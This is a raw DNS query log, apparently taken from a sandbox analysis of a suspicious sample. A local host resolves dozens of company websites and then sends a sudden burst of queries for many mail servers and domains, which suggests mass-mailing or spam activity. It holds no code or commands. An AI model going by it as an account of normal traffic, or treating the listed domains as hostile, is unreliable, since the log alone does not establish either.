                                                                                                                                                                              Sep 15, 2023 07:26:27.571593046 CEST192.168.2.38.8.8.80x16d8Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.847453117 CEST192.168.2.38.8.8.80x6107Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.982770920 CEST192.168.2.38.8.8.80xcf05Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.983144045 CEST192.168.2.38.8.8.80xe027Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:28.555135965 CEST192.168.2.38.8.8.80x518fStandard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:28.714565039 CEST192.168.2.38.8.8.80x45e9Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:28.718466043 CEST192.168.2.38.8.8.80x535bStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:28.864327908 CEST192.168.2.38.8.8.80xb392Standard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:29.014178991 CEST192.168.2.38.8.8.80x67e2Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:30.256726980 CEST192.168.2.38.8.8.80xad8dStandard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:30.362472057 CEST192.168.2.38.8.8.80x3221Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:30.362852097 CEST192.168.2.38.8.8.80x57d4Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:30.850728989 CEST192.168.2.38.8.8.80x2ae2Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:30.960230112 CEST192.168.2.38.8.8.80xb300Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:31.507800102 CEST192.168.2.38.8.8.80xb2f9Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:32.156100988 CEST192.168.2.38.8.8.80xfde1Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:32.522715092 CEST192.168.2.38.8.8.80xb2f9Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:33.210480928 CEST192.168.2.38.8.8.80x1fa3Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:33.538419962 CEST192.168.2.38.8.8.80xb2f9Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:34.504086018 CEST192.168.2.38.8.8.80x1d3eStandard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:35.134850025 CEST192.168.2.38.8.8.80xa6daStandard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:35.497476101 CEST192.168.2.38.8.8.80xc958Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:36.086817026 CEST192.168.2.38.8.8.80x61a2Standard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:36.507426977 CEST192.168.2.38.8.8.80xc958Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:37.522705078 CEST192.168.2.38.8.8.80xc958Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:39.176665068 CEST192.168.2.38.8.8.80x1639Standard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:40.076965094 CEST192.168.2.38.8.8.80x7020Standard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:40.690888882 CEST192.168.2.38.8.8.80x8f7eStandard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:41.269900084 CEST192.168.2.38.8.8.80xd98dStandard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:41.639358997 CEST192.168.2.38.8.8.80x608dStandard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:41.872956991 CEST192.168.2.38.8.8.80x88cStandard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:42.165061951 CEST192.168.2.38.8.8.80x22c1Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:42.384553909 CEST192.168.2.38.8.8.80x1a9eStandard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:42.649004936 CEST192.168.2.38.8.8.80xecc5Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:43.291795969 CEST192.168.2.38.8.8.80x9fc6Standard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:43.535141945 CEST192.168.2.38.8.8.80xda19Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:43.865649939 CEST192.168.2.38.8.8.80x5d94Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:44.071388006 CEST192.168.2.38.8.8.80xbfa8Standard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:44.363132000 CEST192.168.2.38.8.8.80xb764Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:44.423069954 CEST192.168.2.38.8.8.80x388Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:44.882028103 CEST192.168.2.38.8.8.80x510aStandard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:45.124794960 CEST192.168.2.38.8.8.80xfe51Standard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:45.717761993 CEST192.168.2.38.8.8.80x3377Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:45.723170996 CEST192.168.2.38.8.8.80x335eStandard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:46.046566010 CEST192.168.2.38.8.8.80xd157Standard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:46.765698910 CEST192.168.2.38.8.8.80x66cStandard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:47.341859102 CEST192.168.2.38.8.8.80xe1bfStandard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:47.756920099 CEST192.168.2.38.8.8.80x8a03Standard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:47.802108049 CEST192.168.2.38.8.8.80x39bfStandard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:48.161793947 CEST192.168.2.38.8.8.80xc2b5Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:48.418626070 CEST192.168.2.38.8.8.80x420bStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:49.163337946 CEST192.168.2.38.8.8.80xc2b5Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:49.312380075 CEST192.168.2.38.8.8.80x4e36Standard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:49.912211895 CEST192.168.2.38.8.8.80x3619Standard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:50.178756952 CEST192.168.2.38.8.8.80xc2b5Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:50.310489893 CEST192.168.2.38.8.8.80xc9e5Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:51.471718073 CEST192.168.2.38.8.8.80x8428Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:52.303209066 CEST192.168.2.38.8.8.80xb491Standard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:52.548907042 CEST192.168.2.38.8.8.80x21faStandard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:52.656810045 CEST192.168.2.38.8.8.80xcb24Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:53.346990108 CEST192.168.2.38.8.8.80xfaccStandard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:53.663438082 CEST192.168.2.38.8.8.80xcb24Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:54.313831091 CEST192.168.2.38.8.8.80x49a3Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:54.663216114 CEST192.168.2.38.8.8.80xcb24Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:55.247463942 CEST192.168.2.38.8.8.80xf536Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:55.333957911 CEST192.168.2.38.8.8.80x6fc3Standard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:55.885515928 CEST192.168.2.38.8.8.80xb52fStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:56.223653078 CEST192.168.2.38.8.8.80x38c1Standard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:56.855062008 CEST192.168.2.38.8.8.80xd680Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:57.438370943 CEST192.168.2.38.8.8.80xb198Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:57.616585016 CEST192.168.2.38.8.8.80x38a0Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:57.924494028 CEST192.168.2.38.8.8.80xd06fStandard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.037441015 CEST192.168.2.38.8.8.80x6295Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.246037960 CEST192.168.2.38.8.8.80xf3d4Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.469964027 CEST192.168.2.38.8.8.80xfa1aStandard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.631846905 CEST192.168.2.38.8.8.80x38a0Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.878010035 CEST192.168.2.38.8.8.80x372Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:01.530570030 CEST192.168.2.38.8.8.80x2a26Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:04.741823912 CEST192.168.2.38.8.8.80xd2c5Standard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:06.863723040 CEST192.168.2.38.8.8.80xed1eStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:07.253377914 CEST192.168.2.38.8.8.80x190Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:08.422677040 CEST192.168.2.38.8.8.80xdf48Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:09.336694956 CEST192.168.2.38.8.8.80xc4c5Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:10.055718899 CEST192.168.2.38.8.8.80xe6a6Standard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:10.165807962 CEST192.168.2.38.8.8.80xf974Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:11.245381117 CEST192.168.2.38.8.8.80x5baStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:12.228188038 CEST192.168.2.38.8.8.80x7424Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:13.055057049 CEST192.168.2.38.8.8.80x3688Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:13.136497974 CEST192.168.2.38.8.8.80xac9dStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:14.674813032 CEST192.168.2.38.8.8.80xdff8Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:15.197727919 CEST192.168.2.38.8.8.80x8be8Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:15.197773933 CEST192.168.2.38.8.8.80x8bf7Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:15.352628946 CEST192.168.2.38.8.8.80xfd2Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:17.188981056 CEST192.168.2.38.8.8.80xdeb7Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:18.782625914 CEST192.168.2.38.8.8.80xc9acStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:18.823846102 CEST192.168.2.38.8.8.80xc1a1Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.220484972 CEST192.168.2.38.8.8.80x1c8Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.225585938 CEST192.168.2.38.8.8.80x954eStandard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.229192972 CEST192.168.2.38.8.8.80x3412Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.230612993 CEST192.168.2.38.8.8.80x2bcdStandard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.231319904 CEST192.168.2.38.8.8.80x5a6bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.305645943 CEST192.168.2.38.8.8.80x2515Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.305646896 CEST192.168.2.38.8.8.80xdb9fStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.305749893 CEST192.168.2.38.8.8.80xd95eStandard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.310044050 CEST192.168.2.38.8.8.80xa673Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.314687014 CEST192.168.2.38.8.8.80x4f51Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.317847013 CEST192.168.2.38.8.8.80x8921Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.321391106 CEST192.168.2.38.8.8.80x4d92Standard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.324515104 CEST192.168.2.38.8.8.80x65acStandard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.327545881 CEST192.168.2.38.8.8.80x1c37Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.328035116 CEST192.168.2.38.8.8.80x4324Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.329678059 CEST192.168.2.38.8.8.80x6488Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.330468893 CEST192.168.2.38.8.8.80xa31cStandard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.331396103 CEST192.168.2.38.8.8.80xcc38Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.331657887 CEST192.168.2.38.8.8.80xeb6eStandard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.334027052 CEST192.168.2.38.8.8.80x17f8Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.334261894 CEST192.168.2.38.8.8.80xed13Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.336236000 CEST192.168.2.38.8.8.80x86d3Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.337547064 CEST192.168.2.38.8.8.80xeff2Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.337609053 CEST192.168.2.38.8.8.80x1f37Standard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.338181973 CEST192.168.2.38.8.8.80xafe7Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.341685057 CEST192.168.2.38.8.8.80x1d5dStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.341722012 CEST192.168.2.38.8.8.80x53dcStandard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.342132092 CEST192.168.2.38.8.8.80x11aStandard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.353513002 CEST192.168.2.38.8.8.80xca6fStandard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.354578972 CEST192.168.2.38.8.8.80xd8f9Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.354897976 CEST192.168.2.38.8.8.80xbd01Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.410540104 CEST192.168.2.38.8.8.80x3d5eStandard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.465661049 CEST192.168.2.38.8.8.80xfe0eStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.518877983 CEST192.168.2.38.8.8.80x177aStandard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.538825035 CEST192.168.2.38.8.8.80x2dedStandard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.538904905 CEST192.168.2.38.8.8.80xf1f1Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.539639950 CEST192.168.2.38.8.8.80xe657Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.542963982 CEST192.168.2.38.8.8.80x8e79Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.544696093 CEST192.168.2.38.8.8.80xb2baStandard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.546468019 CEST192.168.2.38.8.8.80x3b80Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.547992945 CEST192.168.2.38.8.8.80x780cStandard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.548970938 CEST192.168.2.38.8.8.80x145eStandard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.549549103 CEST192.168.2.38.8.8.80x8a6aStandard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.550690889 CEST192.168.2.38.8.8.80xc73Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.554474115 CEST192.168.2.38.8.8.80x1147Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.555986881 CEST192.168.2.38.8.8.80x8dc4Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.576457024 CEST192.168.2.38.8.8.80x918fStandard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.651875019 CEST192.168.2.38.8.8.80xb873Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.661675930 CEST192.168.2.38.8.8.80x118aStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.661676884 CEST192.168.2.38.8.8.80xd15Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.662591934 CEST192.168.2.38.8.8.80xfaaeStandard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.670537949 CEST192.168.2.38.8.8.80x3121Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.677311897 CEST192.168.2.38.8.8.80xa8faStandard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.736958027 CEST192.168.2.38.8.8.80x8d0eStandard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.739864111 CEST192.168.2.38.8.8.80xde53Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.741802931 CEST192.168.2.38.8.8.80x3ba9Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.742459059 CEST192.168.2.38.8.8.80x88afStandard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.743283987 CEST192.168.2.38.8.8.80xa9b4Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.744283915 CEST192.168.2.38.8.8.80x4832Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.744441032 CEST192.168.2.38.8.8.80x87e2Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.744730949 CEST192.168.2.38.8.8.80x8fdaStandard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.744847059 CEST192.168.2.38.8.8.80xd284Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.749320030 CEST192.168.2.38.8.8.80x7b39Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.756376028 CEST192.168.2.38.8.8.80xcfafStandard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.761351109 CEST192.168.2.38.8.8.80x5574Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.771590948 CEST192.168.2.38.8.8.80x83d0Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.773416042 CEST192.168.2.38.8.8.80x7795Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.815361023 CEST192.168.2.38.8.8.80x40ccStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.815713882 CEST192.168.2.38.8.8.80x8839Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.817843914 CEST192.168.2.38.8.8.80xc704Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.818074942 CEST192.168.2.38.8.8.80xf97dStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.822828054 CEST192.168.2.38.8.8.80xa094Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.824701071 CEST192.168.2.38.8.8.80xcb6aStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.825419903 CEST192.168.2.38.8.8.80x432eStandard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.833889008 CEST192.168.2.38.8.8.80x4adStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.835966110 CEST192.168.2.38.8.8.80x4640Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.862867117 CEST192.168.2.38.8.8.80xa6edStandard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.862987041 CEST192.168.2.38.8.8.80xe819Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.863465071 CEST192.168.2.38.8.8.80xa0cdStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.871512890 CEST192.168.2.38.8.8.80x3ff6Standard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.876401901 CEST192.168.2.38.8.8.80x8b63Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.881877899 CEST192.168.2.38.8.8.80x468eStandard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.886553049 CEST192.168.2.38.8.8.80xf23fStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.899444103 CEST192.168.2.38.8.8.80x31feStandard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.903286934 CEST192.168.2.38.8.8.80x7428Standard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.974471092 CEST192.168.2.38.8.8.80xb2abStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.977118969 CEST192.168.2.38.8.8.80xe0f0Standard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.981259108 CEST192.168.2.38.8.8.80x5a16Standard query (0)avc.com.saA (IP address)IN (0x0001)false
